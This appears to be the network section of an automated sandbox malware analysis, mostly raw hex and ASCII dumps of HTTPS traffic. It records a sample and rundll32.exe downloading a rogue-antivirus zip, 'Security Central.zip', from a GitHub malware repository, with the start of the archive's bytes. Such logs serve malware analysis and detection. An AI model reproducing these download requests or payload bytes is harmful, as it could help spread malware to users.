                                                                                                                                                    2022-09-29 12:59:20 UTC29646INData Raw: 10 da 16 f4 70 35 35 12 a0 61 f3 88 e3 6e fb 66 e6 68 fc 51 9b 88 4a fa a6 97 0a 12 72 3d 5c c7 2e 43 b3 ae cb 49 f8 26 10 a1 ff 5d 24 b9 97 37 7d 39 5e 19 f9 54 df 83 53 a8 b6 eb d5 72 d9 07 93 09 65 f9 2e 2e 09 b3 c4 2f 2e 96 a6 37 52 0c cc 3a 63 09 2b 98 2e 9e bf af 3e 46 02 aa 5d 42 cc a7 06 7f 1c 1d 14 d1 fc 41 d2 ff 6e d5 e0 79 e5 fe 7b 1e e6 c6 90 a0 7c f4 6e 80 36 3d 94 9e 24 c4 41 5d 82 0b 0d d8 34 6e 4e db 92 4f 38 dd 81 5b 9c 1a bb 33 46 43 1f b6 b5 e6 2e fc ca d2 5e b1 71 ba e1 76 e1 ba 2d ee 94 0b de 1c 08 ff f2 1d 7b c5 c3 b6 78 59 43 18 58 f4 ee d8 61 2b e9 67 0e 55 a3 28 7c 00 ef 8e 11 22 5a 48 00 34 a0 e2 86 66 e7 05 9f 40 0a 12 11 11 b8 09 cb 4d f7 2d 8e fd 11 3d bd ee 29 27 86 cf 58 3d 19 d6 36 76 c0 86 c4 b0 69 b8 06 7f 78 b5 32 6e ea
                                                                                                                                                    Data Ascii: p55anfhQJr=\.CI&]$7}9^TSre../.7R:c+.>F]BAny{|n6=$A]4nNO8[3FC.^qv-{xYCXa+gU(|"ZH4f@M-=)'X=6vix2n
                                                                                                                                                    2022-09-29 12:59:20 UTC29662INData Raw: 6a 42 34 1c 00 e7 b3 87 f4 e0 e4 fc 56 f0 dc 3f 5e e8 99 b1 93 52 ec 4c b4 b9 9d be 48 a5 78 4d b0 78 88 2c 4d 7f b3 97 1e 71 34 2a 27 29 0e ab 25 f0 3d 14 00 d9 c7 79 56 a6 7d 76 9d b7 67 a3 bd 0e 8c d3 da a4 f2 e4 c0 ce 93 46 7e bc 49 7c 58 35 64 2d 57 f1 dd 49 79 e4 fd f5 1e 94 73 b1 77 26 92 6c b5 e5 da 14 f3 8a 3f 78 06 e1 ab 01 a4 14 7f 17 bd b3 91 fc e1 26 48 3c 96 b4 4a 5d ad 05 43 5a 0a bf fb 10 1d 21 34 66 88 2c ba 46 78 e7 98 c5 29 58 62 3a bf 72 33 26 b7 a6 69 7c f5 c0 c1 87 44 4b 86 40 98 3b fc 8e 7c ae dd e6 56 ff 6d 2a f5 96 d2 82 47 f3 56 34 d8 6e ec 02 91 78 ec 0c 84 d8 ab da fb bb b8 b7 3f 55 8d 53 17 3e 70 99 2c a1 2e ca f5 45 1f c4 e4 7c f7 3b e0 b3 ca 96 96 60 89 d0 12 b9 8e 27 09 95 de bb af 6d 38 fc 23 5d 47 fe b7 86 c0 2c 41 bb 70
                                                                                                                                                    Data Ascii: jB4V?^RLHxMx,Mq4*')%=yV}vgF~I|X5d-WIysw&l?x&H<J]CZ!4f,Fx)Xb:r3&i|DK@;|Vm*GV4nx?US>p,.E|;`'m8#]G,Ap
                                                                                                                                                    2022-09-29 12:59:20 UTC29678INData Raw: 9a cd 67 8a 48 ce 55 9a 56 c9 9e 48 13 5d fa 43 a1 4a 4f 2b c4 aa 36 a7 50 11 bf ed 36 4c 50 2f ba 5c 5b 02 d7 e1 53 4c 8c 0f 7b f9 7a 2e 2d cc eb 43 cd 47 ba 95 eb c2 16 cc bb 92 10 be bb 6c ff 54 2d e3 a7 03 be 17 b4 86 8e f5 84 f4 e5 80 ef 98 00 9d 79 02 d7 d7 75 c8 59 b9 ba f3 34 0e c2 8c b1 7e 5c d3 74 9e e0 7b d2 e3 09 b4 fa 17 52 69 3c 1d a9 87 a7 e1 58 62 1b 73 44 eb 15 3b 04 8a d7 a0 ba f9 d7 61 d7 3c f5 4f e7 ce e4 43 70 9f c3 46 93 85 82 0b 00 8d 21 b2 e0 86 0c af cd 95 50 b5 93 8c 6d 55 2e 87 9c d0 cc b7 dc a3 e9 4d b9 ea 72 91 90 a8 a5 f0 ea 17 0b 74 10 dd c5 d2 4b 3a 88 b4 c1 96 e1 57 97 ef 19 76 d9 06 76 1c a3 19 ec 55 bf 9e 2e dd 12 61 d4 f1 0f 63 c7 67 36 a5 b3 0e 08 00 50 cc 6c da db fa 7b 8e 24 70 12 02 a8 64 9d 6a d4 a7 48 8e 02 11 8c
                                                                                                                                                    Data Ascii: gHUVH]CJO+6P6LP/\[SL{z.-CGlT-yuY4~\t{Ri<XbsD;a<OCpF!PmU.MrtK:WvvU.acg6Pl{$pdjH
                                                                                                                                                    2022-09-29 12:59:20 UTC29694INData Raw: 60 9e 56 8b 3d 6c 46 b0 3e 48 06 e3 f4 88 73 8d 40 63 7e c7 d9 39 67 5e 0a b2 4a d1 62 8f 61 0b 02 f6 12 f4 10 5f 03 a0 d1 c0 b7 bc f1 c7 9e 13 1a c5 ab 32 70 e5 d9 16 ef 6f fd b5 d1 0e 32 62 75 02 bc 2c 80 76 0a 15 c1 ed f1 85 2d 3f 4f 5e ae 3d f7 e3 3c 19 81 21 de cd 00 99 bb b0 10 b6 c9 73 3c c0 03 0a b3 da 44 35 58 32 f8 72 b2 cf 67 3e 5d 94 15 79 c4 83 55 b0 1c f5 8e c7 47 1b 9e aa 8e 09 dd 01 da 9f 19 a0 1d 1c 0c 36 98 da bd f4 09 d5 a9 ad 4a d7 9a 20 db 27 d4 e7 55 e0 76 20 8a dc e4 53 4c 25 04 17 ca 98 a7 38 77 e6 f2 73 68 b6 d9 3f c4 f7 9d 2c 94 38 83 5e bd 79 47 a3 0e 49 6e 87 04 b6 9d fc c8 1d d7 b1 cb 52 14 2e a4 f9 30 ca 76 2f 92 9c a9 e3 24 0b 6f 77 b1 0b 37 7d fd 6b 01 a2 f1 d7 77 62 31 15 a6 96 23 52 2f dc a5 50 7d f1 de a0 ab ef b1 d1 4d
                                                                                                                                                    Data Ascii: `V=lF>Hs@c~9g^Jba_2po2bu,v-?O^=<!s<D5X2rg>]yUG6J 'Uv SL%8wsh?,8^yGInR.0v/$ow7}kwb1#R/P}M
                                                                                                                                                    2022-09-29 12:59:20 UTC29710INData Raw: ad 5f 7a e7 3c 77 10 d9 77 3f 5a 2c 3b 0d 8a 3c 26 ee 71 d0 6b 68 01 93 9e fe af ec f6 d0 7b 61 e9 dd 87 dd 45 34 a0 c1 7b 52 66 17 22 4a 08 e6 b8 d8 bb 0f b6 78 46 5c 7e 61 e6 5c 0c 4d 51 95 dd 99 8e 44 b6 7f 92 38 80 84 b8 62 0d 5c 5c 34 89 60 1c fc e3 e9 af f5 19 00 cc e2 1c 36 9d 71 4b 93 99 98 6c ad 7c a9 bb e1 0b c6 0b 42 22 f2 5d 5b e7 9e ab be 67 6b 4c 99 16 d2 d7 e4 4d 9f de 3f e2 3c f4 e2 66 68 8c c7 f1 bf 7f d4 59 ae c8 9a 61 f0 26 3a 38 b8 df 9b d6 44 94 24 14 08 ca 37 bf 45 75 10 60 2a d4 57 de 90 19 6e 76 b7 c2 c3 0b 86 e7 fd 2b b3 46 34 75 36 03 17 5b 36 88 d9 f4 c7 f4 d5 0a aa 47 9d df fd ed fd 58 0c 2d 5b 9a 7f 02 ee 72 15 0a a2 15 a9 89 11 54 4e 13 05 f6 94 f6 f1 1a b0 ca e6 c5 2f 6f fd 95 6a e3 b5 39 52 dc 45 51 08 a6 d9 60 1f 48 ab e2
                                                                                                                                                    Data Ascii: _z<ww?Z,;<&qkh{aE4{Rf"JxF\~a\MQD8b\\4`6qKl|B"][gkLM?<fhYa&:8D$7Eu`*Wnv+F4u6[6GX-[rTN/oj9REQ`H
                                                                                                                                                    2022-09-29 12:59:20 UTC29726INData Raw: 6e 0f cf cb 2b be 1a 25 f2 5f 1f cb a5 e8 88 d0 69 ed 78 85 2e 12 03 e8 30 5b 49 50 92 a1 c7 77 1a d7 27 ac b4 a9 5c 0d 3f 33 42 ee 40 d4 aa 55 7b 1c 5b f3 d1 58 cf be 3a 5a e1 2b 22 73 80 2b 5b d3 1d 98 e4 67 84 61 d1 d4 1f 5a 2e bb 03 e4 03 e6 95 71 df 1a 47 c8 42 05 a2 54 d2 e6 a3 f0 09 e1 4e 51 06 aa db 08 c8 e4 93 da 6a 9c 67 e9 b5 e9 40 82 cd f3 6a a1 25 89 d6 15 41 65 a0 0e f1 a4 ee de 1f e2 1f 50 19 34 30 a9 2b d0 ec 17 3c 55 f4 1c 7a 1f ac 8b a2 6c 86 35 ff cd 85 e1 c5 f7 2b 67 e5 a4 9c 29 d2 75 83 65 72 42 16 52 cd 1a 78 7b 3c 10 e8 90 f9 6a 17 3d dd f7 62 77 28 9e 1d e7 f9 9c 48 b8 ef e1 db b3 65 b8 80 19 27 14 4d c6 2b 20 14 5f 9e b3 64 10 e0 38 a2 e1 86 d6 d8 47 c6 c8 6f b6 1d 81 bc 72 df 6c 19 e6 66 38 6f 5d 4b 77 75 fb aa de eb 79 d9 35 a7
                                                                                                                                                    Data Ascii: n+%_ix.0[IPw'\?3B@U{[X:Z+"s+[gaZ.qGBTNQjg@j%AeP40+<Uzl5+g)uerBRx{<j=bw(He'M+ _d8Gorlf8o]Kwuy5
                                                                                                                                                    2022-09-29 12:59:20 UTC29742INData Raw: d4 d0 ba 12 c7 b8 2c b8 16 f7 5d ec 46 b7 da 28 94 00 d4 3d 51 aa 03 3d 7b 38 f1 25 6f 9f cb 9b 69 28 d5 fe e9 2c cc 7a 46 d8 62 20 72 02 0b 82 e6 65 f5 47 79 b6 72 85 6b 2c 9b 60 c2 66 61 50 a8 ca b9 31 cd 25 9d 77 d0 e8 44 83 58 d3 7c dc 47 3d 53 ab 10 73 b8 a8 57 32 9f 72 70 58 a6 ce 99 d1 09 20 08 6b 99 b8 b1 11 df 5f c8 76 1d 39 f9 cf ba d2 f7 20 e1 c7 c3 69 6e 44 4e cc c5 89 53 5a 02 45 ee db f3 12 9e 73 0a 55 d1 19 5a 10 df 1e e3 5b 1a 55 96 f3 ec 18 46 bd 16 0c ff e2 9f 62 ab 05 2a 4b 5c 31 be f3 6b 43 b3 60 35 29 2a 2d 94 56 50 01 33 0e 98 27 cd 99 bf 3e 63 6e 5d 82 05 a5 49 1b 9f ce af 7d b2 2c 07 20 ba bb ed c5 6f 76 81 15 d2 1c 61 8e 39 07 6f 82 40 54 4b 12 b2 45 f8 c7 89 20 28 35 79 49 48 ce a8 f4 f4 85 f9 1e b2 eb a8 ad 61 e1 57 e4 ed 0f 42
                                                                                                                                                    Data Ascii: ,]F(=Q={8%oi(,zFb reGyrk,`faP1%wDX|G=SsW2rpX k_v9 inDNSZEsUZ[UFb*K\1kC`5)*-VP3'>cn]I}, ova9o@TKE (5yIHaWB
                                                                                                                                                    2022-09-29 12:59:20 UTC29758INData Raw: 41 04 07 c4 c9 49 1d 29 48 b2 3f 0a 65 3c b1 95 77 18 f0 e9 cf ef 95 3f fc 64 e0 07 b5 29 5b 46 58 39 f8 07 6d 52 84 a7 d0 cb 1f fa d1 b1 9f e8 05 0e 6a 3b a6 f1 15 89 5d 8c 83 f5 d1 a5 ea ac 38 cf 4e 1b 6e 33 63 5f 54 7c d7 45 6a 99 f0 38 64 7b 7a 1f 03 b7 d2 96 bd 4c 58 af 4a b8 43 fa 75 e5 76 ae 0e e4 a2 77 ad e7 1a 0a a0 f2 0c 05 6b 63 d9 34 00 d7 6f 3b c0 73 41 60 fc f0 85 46 5c 17 01 6b bd ec 58 c0 9f 79 5b f8 5a ae 34 d3 37 78 9c 4c a8 3f d3 a8 c0 9b 28 b2 32 43 50 52 f8 7c 66 60 a5 16 0a fc f7 b6 f6 db 26 70 c8 40 f8 cd ea 60 ec 67 c7 6a c7 62 2d 74 09 5d 0f a4 26 e8 d5 57 0e b0 7e eb fe ea b3 66 c9 8e cd 59 b5 8f 9e f9 1e 78 20 78 47 18 9b 26 38 27 23 ab c6 50 3c cc 8b dd bb bc 35 0e d5 32 d5 86 9b 50 e0 88 0e 78 03 3a 2b 65 22 ca d5 42 78 4e e2
                                                                                                                                                    Data Ascii: AI)H?e<w?d)[FX9mRj;]8Nn3c_T|Ej8d{zLXJCuvwkc4o;sA`F\kXy[Z47xL?(2CPR|f`&p@`gjb-t]&W~fYx xG&8'#P<52Px:+e"BxN
                                                                                                                                                    2022-09-29 12:59:20 UTC29774INData Raw: 3a aa 4e 3a b4 8e 3a 80 f8 5d eb fe 04 17 a4 72 af 82 52 44 1c 7c 77 9d c4 ed d4 51 26 46 91 df 8b c8 7c ca 0b 50 1f a2 71 64 e3 e5 9e 13 4e 3c ff 37 54 db db 6a 28 f2 ad 16 e2 7c f9 ce a5 7f e2 1f 65 8c d7 67 49 3e 97 87 9a 94 9e 1c 22 fa ef 0c 15 e7 d3 9d 37 8b 97 18 98 9d b4 91 7f e9 39 9e a9 c0 14 7d 5c 76 ea 55 37 74 fe bd 44 88 2d 7e d7 38 6b 42 b3 6c de 37 c4 e3 b2 f1 c0 cb 9c 30 5c 18 cc 0b bc a4 79 12 fe a0 2b 2e b3 82 d7 ad e9 29 73 db 5f b8 8d 40 99 d2 79 e3 43 67 e6 f0 a8 d9 d1 15 43 0a 20 65 60 be 54 59 c6 c7 53 77 a8 66 8b 0a ad fb d5 c3 9b 53 ba f9 66 49 ca f8 23 c1 af f3 f2 f7 d4 40 5c ad 6d 39 1f 69 01 48 89 f2 c1 39 6c 73 f8 53 d4 ea 1c 0d a8 e5 30 96 db ee ab 16 15 99 b6 02 57 86 37 0c d1 88 61 5d 0e 7d b2 2b d8 48 08 2d bb a9 63 a4 69
                                                                                                                                                    Data Ascii: :N::]rRD|wQ&F|PqdN<7Tj(|egI>"79}\vU7tD-~8kBl70\y+.)s_@yCgC e`TYSwfSfI#@\m9iH9lsS0W7a]}+H-ci
                                                                                                                                                    2022-09-29 12:59:20 UTC29790INData Raw: e8 e2 67 b4 f4 2a f1 d0 95 bc f1 50 55 65 47 77 ce 0e a6 7d 1d 7b 07 7d 08 87 14 a7 6a df ce 63 a1 ec 37 87 fc d9 77 22 44 bb ff b7 8c ad 44 68 c4 b0 fe b6 db 39 1d b1 4a 5a 29 c0 a8 07 2d ed 2b bc 00 6f 53 71 0d 57 92 97 45 bf 53 7a 3d 2a 2d db 55 54 a0 ca 81 f6 c1 e6 fe 4b c6 24 83 12 d2 99 70 dd ca f3 7c 2c 33 79 19 96 45 40 a1 3f bd 86 02 cb 60 2f c0 c6 f0 44 1e 47 3f ed b2 09 5f 96 1e f7 ab d8 a9 a5 a4 85 e4 09 d7 b6 fb da ab 30 86 77 3c 4c 36 ad 81 4b 08 24 39 7e 15 c4 20 c4 13 d6 7a b0 20 9f f2 43 66 74 78 66 89 69 15 05 0c a0 a5 1f 2e b7 56 a1 69 1d da 45 88 a6 eb 8b 6d 71 07 c9 31 bf 82 d5 e9 bf 8d 19 d4 ba 15 1b 4b 00 33 66 47 35 d1 3d 11 b4 f6 09 dd a2 86 56 c9 9e d8 73 1d 41 5d 1d 27 48 9b ef 01 70 12 06 ad d2 ca 57 10 38 2a 30 15 ad 5c 80 f6
                                                                                                                                                    Data Ascii: g*PUeGw}{}jc7w"DDh9JZ)-+oSqWESz=*-UTK$p|,3yE@?`/DG?_0w<L6K$9~ z Cftxfi.ViEmq1K3fG5=VsA]'HpW8*0\
                                                                                                                                                    2022-09-29 12:59:20 UTC29806INData Raw: f8 76 ee ec fc 10 a8 b7 48 50 9b f8 17 88 34 be a2 58 be 0d a7 24 31 b3 8d 9f f6 40 d9 33 85 10 41 7e ab 25 de a8 a3 19 34 80 b9 3d e7 31 36 f9 0d 3f 2d 9d 00 3c 5b a4 72 d7 06 41 d6 5a 3c 5e 51 9f d3 2f 1d e8 60 44 66 3c fc c6 12 05 04 2b ea 00 91 84 0d 09 ce 62 b5 20 c3 7b 1c 03 0a 08 00 49 83 51 ef 47 ba 3b dc d6 6d f8 4e 73 56 a3 51 a6 d0 d1 03 a9 21 7d 6e 1d 77 34 61 cf 40 8a 5e 29 cd da f6 e4 bb 64 3d cc 99 10 af ed 34 fc f9 5e 9e 2e e2 3b 22 29 b7 02 d2 6b 3e 00 5e f1 9c a5 bd 79 7d ab b9 ee 20 10 a5 35 65 1c f8 b2 15 69 bb dd e9 27 62 b4 f7 cd 2d d0 22 1e ce e1 c2 21 92 d2 9a 3b bf a0 47 79 3e bc 88 53 60 b6 53 60 45 27 12 80 e7 0d 56 53 3e ef 19 69 5b 91 d8 ec 7e b6 43 6f 8f 9d 4b e5 76 77 a6 ec 1b 86 f0 a2 7e 1b ba b4 94 33 af c6 ec 10 aa 50 5c
                                                                                                                                                    Data Ascii: vHP4X$1@3A~%4=16?-<[rAZ<^Q/`Df<+b {IQG;mNsVQ!}nw4a@^)d=4^.;")k>^y} 5ei'b-"!;Gy>S`S`E'VS>i[~CoKvw~3P\
                                                                                                                                                    2022-09-29 12:59:20 UTC29822INData Raw: 6a 7e 80 7c 7a 39 5a 51 51 23 7f c5 54 08 61 f9 3a eb 7a a7 29 24 9a a6 74 26 93 50 b6 e5 81 ab 1a 14 e6 52 03 26 06 51 e8 3e 5f 08 16 35 15 b7 43 0f 19 31 a4 31 c9 0c f8 31 ba 34 39 dd 38 6c db 41 90 61 49 ae 7d 44 50 08 a1 d4 2b c1 34 55 68 48 73 c9 64 e9 c1 e8 6a 07 9d e0 9f ec 86 64 1f f3 59 72 7c dc 66 4e 77 4a 24 8d 05 4a 7c 8e 11 38 96 ed 66 a1 f5 f2 27 a9 1f 1b 51 aa 00 26 7c fc 8d 58 a2 46 6d a3 ac 1d 5a 04 f9 1b 69 5f 61 fb 63 e3 db f4 12 ef be 4f 9e 6c c0 4f 35 fa 66 e0 ca 2d 7e 14 d5 38 69 81 35 f8 69 be ad b9 ed a4 f2 91 e0 ed b7 00 71 30 24 12 6f bc a4 e8 c8 49 b0 96 07 4a c6 3d 6b 71 54 40 4e a0 75 11 17 d1 da e1 af 8d 73 43 f1 7c ee e8 60 1d 11 e6 b6 f8 22 58 38 9f 81 97 fa ee 73 11 15 10 6e 68 f8 2c 9f c1 5f 7a 19 ee 7d cc 55 f0 81 c5 f6
                                                                                                                                                    Data Ascii: j~|z9ZQQ#Ta:z)$t&PR&Q>_5C111498lAaI}DP+4UhHsdjdYr|fNwJ$J|8f'Q&|XFmZi_acOlO5f-~8i5iq0$oIJ=kqT@NusC|`"X8snh,_z}U


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    113192.168.2.349764140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:21 UTC29823OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    114140.82.121.3443192.168.2.349764C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:21 UTC29823INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:57:25 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:21 UTC29823INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    115192.168.2.349765185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:21 UTC29825OUTGET /Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    116185.199.108.133443192.168.2.349765C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:21 UTC29825INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 904153
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "8e55325d7d02c8c00d68591213067b37bcdc1e53f173bbf25946b78df6ae59e8"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 083B:E9DE:2DF92:A5F15:63359361
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:21 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6920-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456361.175471,VS0,VE167
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: e449212f56ca94c1519b4da8ced513257566d24a
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:21 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:21 UTC29826INData Raw: 50 4b 03 04 14 00 01 00 08 00 50 44 9a 45 d8 2f 25 f2 17 cb 0d 00 00 22 0e 00 1e 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 43 65 6e 74 72 61 6c 2e 65 78 65 93 de 92 39 11 16 14 a3 28 f7 f0 f1 f9 49 df 84 3b 78 1e 78 4b eb e8 c8 8b 76 80 1b 30 bf 6b 3d ab 93 0f 3b d1 ef 05 65 57 77 36 bc 87 bf 0d 4b 10 58 f5 50 56 15 5e 92 26 62 a3 82 cb a0 49 4c 04 31 fb 16 a4 f4 c6 30 4f 20 6a 2a 9f 49 18 c9 db 96 6e e6 d7 0f d5 79 dd 88 92 62 e7 2c c6 f3 0a 78 2d 00 ff 80 51 8d ca 38 dd a4 d8 b3 84 a1 fd 9b 28 af 70 32 ca fd 27 e6 7a cb d0 b2 4d 1a 66 28 88 ef 52 28 b9 74 da b4 57 29 20 23 85 b8 16 ff 02 b8 15 7d be 8a e2 35 e6 f3 4b 05 d8 97 1d 8c 51 67 97 90 1f ef 8f 05 7b 11 b5 58 ce 4a 44 bf c8 79 1e 44 09 b4 29 96 5c 11 85 c6 e8 88 54 8b 99
                                                                                                                                                    Data Ascii: PKPDE/%"Endermanch@SecurityCentral.exe9(I;xxKv0k=;eWw6KXPV^&bIL10O j*Inyb,x-Q8(p2'zMf(R(tW) #}5KQg{XJDyD)\T
                                                                                                                                                    2022-09-29 12:59:21 UTC29842INData Raw: 1a 3e 6e 52 f7 ef 2f 87 37 dd bb bb 88 c8 24 ca 5b 4e dc bd 5d 15 d9 b7 5a b5 cd 50 85 fe 9f ba 69 be 32 0c 0c 36 c5 7e d1 42 8b 50 fc cf 4b 55 cb fa 0f d0 bf 8b 60 33 a8 d5 d7 77 3d 8c be 84 38 23 f5 74 8d 6a 95 2d ea 7b b8 73 fd a7 bf 92 5d 1b c6 13 ed f0 cc a7 bc e1 3c c2 09 19 46 63 0a bb 75 d8 09 7f d6 ba c2 b6 82 6e 17 68 49 6a 56 b6 62 7d 47 a1 73 f8 d2 7e b1 58 5e d3 2a 08 13 b7 25 0d 0e b2 ac 5a 33 2e 51 18 22 cd e7 8b cc 24 40 f9 71 57 a2 18 69 30 17 d9 70 58 e5 0a d3 f6 06 50 4f 27 9b 33 63 ba 4e 88 db 36 07 3b e8 c6 c4 72 51 a8 f9 72 c7 32 b5 75 42 90 ea 87 f7 36 81 06 af 3c 9f 44 b3 54 69 04 66 a0 e6 39 61 ff 65 31 b0 6d c4 af 14 37 01 e8 b2 4c c6 fc 80 53 b1 0e d3 10 7d 46 3d e8 1d c5 f5 ce c8 df df 67 e0 28 bf 49 b1 e8 65 94 6f 3c f1 25 50
                                                                                                                                                    Data Ascii: >nR/7$[N]ZPi26~BPKU`3w=8#tj-{s]<FcunhIjVb}Gs~X^*%Z3.Q"$@qWi0pXPO'3cN6;rQr2uB6<DTif9ae1m7LS}F=g(Ieo<%P
                                                                                                                                                    2022-09-29 12:59:21 UTC29858INData Raw: 7d b3 1c 4a 15 b3 a1 4c 44 ea 7e 89 39 59 30 36 05 78 fc d2 78 ad 35 fa 9d 0f d7 3a 9e ff a3 51 26 2d 49 db 56 9d c4 66 cf dd 9e 41 87 07 74 d6 9e 95 10 ec e7 9a c9 ad 38 ac 04 13 a1 03 73 c0 23 db 4b f6 88 1d aa fe 80 52 2a 82 ea 8c d8 76 55 45 c9 75 fe 36 61 13 a2 b0 a0 0b 11 30 c7 49 8e 0d fe a1 e8 bc 22 02 02 10 e3 72 1e 22 9b c3 99 94 e1 b2 4f 2f cc b2 f8 ca bd 34 80 2b 03 61 1b 26 a2 90 b4 b4 72 23 d2 38 3d 59 79 c7 8f 61 f4 f7 d0 57 1f 07 e8 e4 5b b0 94 da 74 f7 e4 2c 74 f4 82 dd a4 17 f8 27 62 c6 b4 37 b8 7c 30 ec dc 74 41 93 4e ac 9e 8c 82 72 0a 37 9c 38 60 2f 07 11 c3 90 3d e4 fe 5b 1c 7f f7 21 1b 39 fe 15 58 e3 f2 03 24 93 35 f8 4b 9f 5c 88 5b 7c 77 38 b9 af b9 9c 1d e1 83 78 7a f5 17 52 f7 38 ee cd c1 e8 95 c7 59 f7 65 88 0a d6 50 9b d9 de 3c
                                                                                                                                                    Data Ascii: }JLD~9Y06xx5:Q&-IVfAt8s#KR*vUEu6a0I"r"O/4+a&r#8=YyaW[t,t'b7|0tANr78`/=[!9X$5K\[|w8xzR8YeP<
                                                                                                                                                    2022-09-29 12:59:21 UTC29874INData Raw: 0a 89 9d ee 52 8f a6 99 de bc 52 13 c9 be f1 e8 c1 a8 f1 38 49 b4 fd 75 0f c4 ef c2 3e d3 96 08 00 c0 1d bc c6 bf 01 4f 65 e1 e5 9f ed ca 08 dd ab 9d 55 ca d2 00 99 5b 37 3b 62 4b a2 5b 64 a8 ae 32 92 b8 d7 47 e5 63 b0 33 63 0e 88 f5 33 ce 3f d8 24 ed 44 46 87 b9 22 55 65 71 77 b7 e2 e4 d9 b4 a6 63 cf 6c f8 89 0b 04 be 8d 44 80 41 fe d4 7f e4 7c 7f 8e c9 81 68 57 96 93 09 50 fb c6 f1 ba a7 f0 b0 84 6d 1b d3 ad f0 29 51 5a 04 db 96 a6 e3 05 7c ee bb 63 6a bc 68 a9 28 10 81 9d 13 9d d1 e5 d8 ae f2 85 02 5a cb 30 61 99 3e 22 65 25 b2 20 b4 1a 26 55 c2 38 a6 ec 36 fb ab 37 44 00 76 0e 94 87 ee 19 07 a7 22 fa ec a1 c1 29 7b 85 fc 14 c7 c4 10 f7 30 8c 2a 57 4a a2 32 0e 63 93 3a db a1 7d 91 5d eb a4 40 d5 27 0c 6e ff ad 82 03 54 b3 8b 49 48 3e 4d 1e e6 15 ed 8f
                                                                                                                                                    Data Ascii: RR8Iu>OeU[7;bK[d2Gc3c3?$DF"UeqwclDA|hWPm)QZ|cjh(Z0a>"e% &U867Dv"){0*WJ2c:}]@'nTIH>M
